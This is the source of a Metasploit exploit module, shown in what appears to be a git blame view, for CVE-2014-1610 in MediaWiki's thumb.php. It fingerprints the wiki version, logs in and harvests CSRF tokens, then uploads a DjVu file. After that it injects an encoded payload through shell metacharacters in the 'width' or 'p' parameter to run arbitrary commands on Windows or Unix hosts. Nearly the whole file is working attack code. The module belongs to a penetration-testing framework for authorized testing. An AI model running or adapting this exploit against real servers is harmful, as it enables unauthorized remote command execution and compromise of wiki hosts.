metasploit-framework/modules/exploits/multi/http/mediawiki_thumb.rb

369 lines
12 KiB
Ruby
Raw Normal View History

2014-01-31 18:51:18 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-01-31 18:51:18 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
2014-02-07 20:37:44 +00:00
'Name' => 'MediaWiki Thumb.php Remote Command Execution',
2014-01-31 18:51:18 +00:00
'Description' => %q{
2014-02-01 00:26:55 +00:00
MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,
2014-02-07 20:37:44 +00:00
when DjVu or PDF file upload support is enabled, allows remote unauthenticated
users to execute arbitrary commands via shell metacharacters. If no target file
is specified this module will attempt to log in with the provided credentials to
upload a file (.DjVu) to use for exploitation.
2014-01-31 18:51:18 +00:00
},
'Author' =>
[
2014-02-01 00:26:55 +00:00
'Netanel Rubin', # from Check Point - Discovery
2014-02-04 00:51:34 +00:00
'Brandon Perry', # Metasploit Module
2014-02-01 00:43:39 +00:00
'Ben Harris', # Metasploit Module
'Ben Campbell' # Metasploit Module
2014-01-31 18:51:18 +00:00
],
'License' => MSF_LICENSE,
'References' =>
[
2014-02-01 00:26:55 +00:00
[ 'CVE', '2014-1610' ],
[ 'OSVDB', '102630'],
[ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],
[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]
2014-01-31 18:51:18 +00:00
],
'Privileged' => false,
'Targets' =>
[
2014-02-07 23:26:57 +00:00
[ 'Automatic PHP-CLI',
2014-02-04 00:51:34 +00:00
{
'Payload' =>
{
2014-02-04 14:27:10 +00:00
'BadChars' => "\r\n",
2014-02-07 23:26:57 +00:00
'PrependEncoder' => "php -r \"",
'AppendEncoder' => "\""
2014-02-04 00:51:34 +00:00
},
'Platform' => ['php'],
'Arch' => ARCH_PHP
}
],
2014-02-04 14:27:10 +00:00
[ 'Linux CMD',
2014-02-04 00:51:34 +00:00
{
'Payload' =>
{
2014-02-07 23:26:57 +00:00
'BadChars' => "",
2014-02-04 00:51:34 +00:00
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python php',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD
}
2014-02-04 14:27:10 +00:00
],
[ 'Windows CMD',
{
'Payload' =>
{
2014-02-07 23:26:57 +00:00
'BadChars' => "",
2014-02-04 14:27:10 +00:00
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl',
2014-02-04 14:27:10 +00:00
}
},
'Platform' => ['win'],
'Arch' => ARCH_CMD
}
2014-02-04 00:51:34 +00:00
]
2014-01-31 18:51:18 +00:00
],
'DefaultTarget' => 0,
2014-02-01 00:26:55 +00:00
'DisclosureDate' => 'Jan 28 2014'))
2014-01-31 18:51:18 +00:00
register_options(
[
2014-02-04 00:51:34 +00:00
OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),
OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),
2014-02-04 00:51:34 +00:00
OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),
OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])
2014-01-31 18:51:18 +00:00
], self.class)
end
2014-02-04 00:51:34 +00:00
def get_version(body)
meta_generator = get_html_value(body, 'meta', 'generator', 'content')
unless meta_generator
vprint_status("No META Generator tag on #{full_uri}.")
return nil, nil, nil
end
if meta_generator && meta_generator =~ /mediawiki/i
vprint_status("#{meta_generator} detected.")
meta_generator =~ /(\d)\.(\d+)[\.A-z]+(\d+)/
major = $1.to_i
minor = $2.to_i
patch = $3.to_i
vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")
return major, minor, patch
end
return nil, nil, nil
end
2014-01-31 18:51:18 +00:00
def check
2014-02-01 00:26:55 +00:00
uri = target_uri.path
2014-02-04 00:51:34 +00:00
opts = { 'uri' => normalize_uri(uri, 'index.php') }
2014-02-04 15:25:51 +00:00
response = send_request_cgi!(opts)
2014-02-01 00:26:55 +00:00
if opts['redirect_uri']
vprint_status("Redirected to #{opts['redirect_uri']}.")
end
unless response
vprint_status("No response from #{full_uri}.")
return CheckCode::Unknown
end
# Mediawiki will give a 404 for unknown pages but still have a body
if response.code == 200 || response.code == 404
vprint_status("#{response.code} response received...")
2014-02-04 00:51:34 +00:00
major, minor, patch = get_version(response.body)
unless major
return CheckCode::Unknown
end
2014-02-01 00:26:55 +00:00
if major == 1 && (minor < 8 || minor > 22)
return CheckCode::Safe
elsif major == 1 && (minor == 22 && patch > 1)
return CheckCode::Safe
elsif major == 1 && (minor == 21 && patch > 4)
return CheckCode::Safe
elsif major == 1 && (minor == 19 && patch > 10)
2014-02-04 00:51:34 +00:00
return CheckCode::Safe
elsif major == 1
return CheckCode::Appears
2014-02-04 00:51:34 +00:00
else
return CheckCode::Safe
2014-02-01 00:26:55 +00:00
end
end
vprint_status("Received response code #{response.code} from #{full_uri}")
CheckCode::Unknown
2014-01-31 18:51:18 +00:00
end
def exploit
2014-02-04 00:51:34 +00:00
uri = target_uri.path
2014-02-07 23:26:57 +00:00
print_status("Grabbing version and login CSRF token...")
2014-01-31 18:51:18 +00:00
response = send_request_cgi({
2014-02-04 00:51:34 +00:00
'uri' => normalize_uri(uri, 'index.php'),
2014-01-31 18:51:18 +00:00
'vars_get' => { 'title' => 'Special:UserLogin' }
})
2014-02-01 00:26:55 +00:00
unless response
2014-01-31 18:51:18 +00:00
fail_with(Failure::NotFound, "Failed to retrieve webpage.")
end
2014-02-07 23:26:57 +00:00
server = response['Server']
if server && target.name =~ /automatic/i && server =~ /win32/i
vprint_status("Windows platform detected: #{server}.")
my_platform = Msf::Module::Platform::Windows
elsif server && target.name =~ /automatic/i
vprint_status("Nix platform detected: #{server}.")
my_platform = Msf::Module::Platform::Unix
2014-02-07 23:26:57 +00:00
else
my_platform = target.platform.platforms.first
end
# If we have already identified a DjVu/PDF file on the server trigger
# the exploit
unless datastore['FILENAME'].blank?
payload_request(uri, datastore['FILENAME'], my_platform)
return
end
username = datastore['USERNAME']
password = datastore['PASSWORD']
2014-02-04 00:51:34 +00:00
major, minor, patch = get_version(response.body)
# Upload CSRF added in v1.18.2
# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1
if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))
upload_csrf = false
elsif ((major == 1) && (minor < 18))
upload_csrf = false
else
upload_csrf = true
end
2014-01-31 18:51:18 +00:00
session_cookie = response.get_cookies
2014-02-02 22:19:54 +00:00
wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')
2014-02-01 00:26:55 +00:00
2014-02-07 21:58:33 +00:00
if wp_login_token.blank?
fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")
2014-01-31 18:51:18 +00:00
else
2014-02-01 00:26:55 +00:00
print_good("Retrieved login CSRF token.")
2014-01-31 18:51:18 +00:00
end
2014-02-01 00:26:55 +00:00
print_status("Attempting to login...")
2014-01-31 18:51:18 +00:00
login = send_request_cgi({
2014-02-04 00:51:34 +00:00
'uri' => normalize_uri(uri, 'index.php'),
2014-01-31 18:51:18 +00:00
'method' => 'POST',
'vars_get' => {
'title' => 'Special:UserLogin',
'action' => 'submitlogin',
'type' => 'login'
},
'cookie' => session_cookie,
'vars_post' => {
'wpName' => username,
'wpPassword' => password,
'wpLoginAttempt' => 'Log in',
2014-01-31 18:51:18 +00:00
'wpLoginToken' => wp_login_token
}
})
2014-02-01 00:26:55 +00:00
if login and login.code == 302
print_good("Log in successful.")
else
fail_with(Failure::NoAccess, "Failed to log in.")
2014-01-31 18:51:18 +00:00
end
auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')
2014-02-04 00:51:34 +00:00
# Testing v1.15.1 it looks like it has session fixation
# vulnerability so we dont get a new session cookie after
# authenticating. Therefore we need to include our old cookie.
unless auth_cookie.include? 'session='
auth_cookie << session_cookie
end
print_status("Getting upload CSRF token...") if upload_csrf
2014-02-01 00:26:55 +00:00
upload_file = send_request_cgi({
2014-02-04 00:51:34 +00:00
'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),
2014-01-31 18:51:18 +00:00
'cookie' => auth_cookie
})
2014-02-01 00:26:55 +00:00
unless upload_file and upload_file.code == 200
fail_with(Failure::NotFound, "Failed to access file upload page.")
2014-01-31 18:51:18 +00:00
end
2014-02-04 00:51:34 +00:00
wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf
2014-02-02 22:19:54 +00:00
wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')
title = get_html_value(upload_file.body, 'input', 'title', 'value')
2014-02-01 00:26:55 +00:00
if upload_csrf && wp_edit_token.blank?
2014-02-04 00:51:34 +00:00
fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")
elsif upload_csrf
print_good("Retrieved upload CSRF token.")
2014-01-31 18:51:18 +00:00
end
upload_mime = Rex::MIME::Message.new
2014-02-01 00:37:28 +00:00
djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))
2014-02-01 00:26:55 +00:00
file_name = "#{rand_text_alpha(4)}.djvu"
upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"")
2014-02-01 00:26:55 +00:00
upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\"wpDestFile\"")
upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\"wpUploadDescription\"")
upload_mime.add_part("", nil, nil, "form-data; name=\"wpLicense\"")
upload_mime.add_part("1",nil,nil, "form-data; name=\"wpIgnoreWarning\"")
2014-02-04 00:51:34 +00:00
upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") if upload_csrf
2014-02-01 00:26:55 +00:00
upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"")
upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")
upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"")
post_data = upload_mime.to_s
2014-02-01 00:26:55 +00:00
print_status("Uploading DjVu file #{file_name}...")
2014-01-31 18:51:18 +00:00
upload = send_request_cgi({
'method' => 'POST',
2014-02-04 00:51:34 +00:00
'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),
2014-02-01 00:26:55 +00:00
'data' => post_data,
'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",
'cookie' => auth_cookie
2014-01-31 18:51:18 +00:00
})
2014-02-01 00:26:55 +00:00
if upload and upload.code == 302 and upload.headers['Location']
location = upload.headers['Location']
print_good("File uploaded to #{location}")
else
if upload.body.include? 'not a permitted file type'
2014-02-07 21:58:33 +00:00
fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")
else
fail_with(Failure::UnexpectedReply, "Failed to upload file.")
end
2014-02-01 00:26:55 +00:00
end
2014-01-31 18:51:18 +00:00
2014-02-07 23:26:57 +00:00
payload_request(uri, file_name, my_platform)
2014-02-04 00:51:34 +00:00
end
2014-01-31 18:51:18 +00:00
2014-02-07 23:26:57 +00:00
def payload_request(uri, file_name, my_platform)
if my_platform == Msf::Module::Platform::Windows
trigger = "1)&(#{payload.encoded})&"
else
trigger = "1;#{payload.encoded};"
end
2014-02-07 20:37:44 +00:00
vars_get = { 'f' => file_name }
if file_name.include? '.pdf'
vars_get['width'] = trigger
elsif file_name.include? '.djvu'
vars_get['width'] = 1
2014-02-07 23:26:57 +00:00
vars_get['p'] = trigger
2014-02-07 20:37:44 +00:00
else
fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")
end
2014-02-01 00:26:55 +00:00
print_status("Sending payload request...")
2014-02-04 13:52:56 +00:00
r = send_request_cgi({
2014-02-04 00:51:34 +00:00
'uri' => normalize_uri(uri, 'thumb.php'),
2014-02-07 20:37:44 +00:00
'vars_get' => vars_get
2014-02-04 14:27:10 +00:00
}, 1)
if r && r.code == 404 && r.body =~ /not exist/
print_error("File: #{file_name} does not exist.")
elsif r
print_error("Received response #{r.code}, exploit probably failed.")
2014-02-04 14:27:10 +00:00
end
2014-02-01 00:26:55 +00:00
end
2014-02-02 22:19:54 +00:00
# The order of name, value keeps shifting so regex is painful.
# Cant use nokogiri due to security issues
# Cant use REXML directly as its not strict XHTML
# So we do a filthy mixture of regex and REXML
def get_html_value(html, type, name, value)
return nil unless html
return nil unless type
return nil unless name
return nil unless value
found = nil
html.each_line do |line|
if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i
found = $&
break
end
end
if found
doc = REXML::Document.new found
return doc.root.attributes[value]
end
2014-02-04 00:51:34 +00:00
''
2014-01-31 18:51:18 +00:00
end
end